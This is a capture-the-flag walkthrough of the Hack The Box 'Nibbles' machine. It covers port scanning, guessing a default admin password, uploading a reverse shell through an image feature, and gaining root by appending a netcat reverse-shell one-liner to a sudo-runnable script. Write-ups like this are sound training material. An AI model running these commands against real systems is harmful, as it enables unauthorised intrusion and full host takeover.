HackTheBox: Nibbles — Walkthrough

Owned Nibbles from Hack The Box!

Enumeration

Let’s get started. Nmap Scan

Nmap scan report for 10.10.10.75
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.04 seconds

As we can see there are two ports open 22 and 80. Lets enumerate the 80 port.

Nothing interesting on the web page let’s look at its source code.

We can see and directory named /nibbleblog/ let’s see what this directory has.

Nothing interesting on the page let’s enumerate the directories with gobuster.

Found lot’s of Interesting directories there. Let’s enumerate these directories.

Found config file that indicates that username is admin. So let’s try default creds.

I have tried admin/admin but didn’t worked but I saw nibbles is mentioned quite a few times so I tried that and boom it worked we are in.

After looking features I looked at My Image feature that’s interesting let’s upload something and see it works or not.

It worked now we can upload the reverse shell to get the initial foothold on this.

While this is great, this does not give us a particularly nice shell to work with. We need to make it smarter by making it fully interactive. We call this upgrading to a fully interactive TTY. We can do this with a simple Python call and should look like this:

python3 -c 'import pty; pty.spawn("/bin/bash")'

You can get the user flag from nibblers home. So now we have to priv esc this machine let’s dig deeper.

Nibbler has an zip file that has the monitor script which can be run by nibbler user that can be a possible attack vector for privilege escalation.

We can use the following command to add a one-liner to the monitor.sh shell script:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 8443 >/tmp/f' | tee -a monitor.sh

Remember to edit the ip address, and take note of the port number (8443). Now all that is needed is running another netcat listener:

nc -lvnp 8443

And run the script!

sudo /home/nibbler/personal/stuff/monitor.sh

We got the root :) You can get the flag from root directory.